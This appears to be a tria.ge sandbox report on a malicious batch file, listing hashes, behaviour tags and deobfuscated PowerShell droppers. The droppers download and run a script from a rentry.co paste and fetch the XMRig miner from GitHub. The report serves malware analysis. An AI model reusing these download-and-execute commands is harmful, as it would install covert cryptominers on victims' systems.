Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

General

  • Target

    107671216610864.bat

  • Size

    517B

  • Sample

    240630-3awgqsydrf

  • MD5

    ac9d73455d58bfa42f81e718b8c8d6b5

  • SHA1

    60040fff333b7bc09b22e5c013f11b8a99555ed3

  • SHA256

    4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12

  • SHA512

    ad24994554a8e6bb68f5ca80b1c53379f7a577964165f56d2f6bef14340fec3d0f17d14faa2db4651776a83bd5686f26ee59080ee2a16d0468b8d38504e460b2

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
1
$wc = new-object system.net.webclient
2
$tempfile = [system.io.path]::gettempfilename()
3
$tempfile = ".bat"
4
$wc.downloadfile("https://rentry.co/regele/raw", ".bat")
5
.bat 42 crnhwckm6bmza8jmwyvwb2tjacxqgmj1qhhj9ae55qrx488q6cvau42ekkeied2n9te1ujnviusnvqv1nj17r79fdhjvl
6
remove-item -force $tempfile
7
URLs
exe.dropper

https://rentry.co/regele/raw

Extracted

Language
ps1
Deobfuscated
1
$wc = new-object system.net.webclient
2
$wc.downloadfile("https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip", "C:\\Users\\Admin\\xmrig.zip")
3
URLs
exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language
ps1
Deobfuscated
1
[net.servicepointmanager]::securityprotocol = "tls12, tls11, tls"
2
$wc = new-object system.net.webclient
3
$str = $wc.downloadstring("https://github.com/xmrig/xmrig/releases/latest")
4
$str|findstr msvc-win64.zip|findstr download
5
URLs
ps1.dropper

https://github.com/xmrig/xmrig/releases/latest

Extracted

Language
ps1
Deobfuscated
1
[net.servicepointmanager]::securityprotocol = "tls12, tls11, tls"
2
$wc = new-object system.net.webclient
3
$wc.downloadfile("https://github.comDownloadString", "C:\\Users\\Admin\\xmrig.zip")
4
URLs
exe.dropper

https://github.comDownloadString

Targets

    • Target

      107671216610864.bat

    • Size

      517B

    • MD5

      ac9d73455d58bfa42f81e718b8c8d6b5

    • SHA1

      60040fff333b7bc09b22e5c013f11b8a99555ed3

    • SHA256

      4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12

    • SHA512

      ad24994554a8e6bb68f5ca80b1c53379f7a577964165f56d2f6bef14340fec3d0f17d14faa2db4651776a83bd5686f26ee59080ee2a16d0468b8d38504e460b2

    Score
    10/10
    • Blocklisted process makes network request

    • Stops running service(s)

    • Legitimate hosting services abused for malware hosting/C2

MITRE ATT&CK Enterprise v15

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.